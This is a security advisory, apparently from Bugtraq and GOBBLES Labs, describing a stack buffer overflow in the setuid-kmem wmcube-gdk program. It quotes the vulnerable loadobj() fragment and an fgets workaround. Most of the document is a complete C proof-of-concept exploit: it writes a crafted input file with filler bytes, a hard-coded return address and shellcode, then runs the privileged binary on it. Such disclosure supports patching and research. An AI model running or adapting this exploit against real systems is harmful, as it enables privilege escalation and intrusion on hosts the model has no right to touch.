| WMCube / GDK is a modified and optimized version of WMCube 0.98. A security vulnerability in the product would allow an attacker to overflow one of the product's internal buffer and execute arbitrary code. Since the product is setuid kmem, privileged access to the memory can be gained. |
Credit:
The information has been provided by bugtraq (GOBBLES Labs).
Vulnerable code:
/* Reads an object description from a file. Only the fragment quoted by the
 * advisory is reproduced here: the "..." lines and the bare numeric label are
 * elisions, not compilable C, so the surrounding logic cannot be assessed. */
int loadobj(char *filename)
{
FILE *fp;
char tmp[64] = { "" };   /* fixed-size stack buffer that fscanf() writes into */
int i = 0, counter = 1;
10:
...
/* BUG: "%s" carries no field width, so fscanf() copies a whitespace-delimited
 * token of any length into tmp[64]; a longer token overruns the stack buffer.
 * The advisory's workaround is a bounded read (fgets(tmp, 64, fp)). */
fscanf(fp, "%s", tmp);
...
goto 10;
}
Workaround:
Replace `fscanf(fp, "%s", tmp);` in loadobj() (wmcube.c) with `fgets(tmp, 64, fp);`, which bounds the read to the size of tmp (a field width such as `%63s` would likewise bound the scan).
Exploit:
/*
* (c) Andrew / GOBBLES Security
*
* PoC exploit for wmcube-gdk
*
* Usage: /path/to/GOBBLES-wmcube-gdk-exploit [offset]
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
/* Payload bytes shipped with the advisory; main() writes them verbatim into
 * the crafted input file. They are an opaque machine-code string here — what
 * they execute is not documented on this page. */
unsigned char GOBBLES_shellcode[] =
"\xb8\xf5\xf5\xff\xff\xf7\xd0\x50\xb8\xb3\xba\xac\xde\xf7\xd0\x50"
"\xb8\xb8\xb0\xbd\xbd\xf7\xd0\x50\x89\xe6\x31\xc0\x31\xdb\xb0\xf5"
"\xf6\xd0\x50\x56\x53\xb0\x04\x50\xcd\x80\xb0\x01\x50\xcd\x80";
/* Writes a crafted input file named ".gobbles" in the current directory and
 * then replaces this process with wmcube-gdk reading that file.
 *
 * argv[1], when present, is an offset added to the hard-coded return address
 * (atoi() is unchecked, so a non-numeric argument silently contributes 0).
 * Returns 0 only when execl() fails; on success the process image is replaced
 * and nothing after the execl() call runs. */
int main(int argc, char **argv) {
FILE *fd;
int i;
u_long retaddy = 0xbfbff634;   /* hard-coded address; NOTE(review): target-specific value */
if(argc == 2)
retaddy += atoi(argv[1]);
fd = fopen(".gobbles", "wt");  /* NOTE(review): return value is not checked; a NULL fd would be passed to fprintf() below */
fprintf(fd, "WMCUBE_COORDINATES\n");
fprintf(fd, "1aaa"); // atoi()..
for(i = 0; i < 64; i += 8)
fprintf(fd, "GOBBLES!");   /* 64 bytes of filler — the size of loadobj()'s tmp[64] */
printf("GOBBLES: Using %lx as retaddy\n", retaddy);
fflush(NULL);
fwrite(&retaddy, 4, 1, fd);   /* writes exactly 4 bytes regardless of sizeof retaddy; NOTE(review): assumes a 32-bit u_long */
fprintf(fd, "GOBBLES!");
fprintf(fd, "GOBBLES!");
fprintf(fd, "%s", GOBBLES_shellcode);
fprintf(fd, " 0 -42 42\n");
fprintf(fd, "WMCUBE_LINES\n");
fprintf(fd, "1 1\n");
fclose(fd);   /* return value unchecked; a short write would go unnoticed */
/* Path taken from the advisory. The trailing 0 terminator should be (char *)NULL:
 * execl() is variadic, and a plain 0 is not guaranteed to be pointer-sized. */
execl("/usr/X11R6/bin/wmcube-gdk", "wmcube-gdk", "-o", ".gobbles", 0);
/* Reached only if execl() failed: remove the crafted file and report. */
unlink(".gobbles"); /* Mum always told me to cleanup when im done! */
fprintf(stderr, "System immune against GOBBLES exploit!\n");
return 0;
}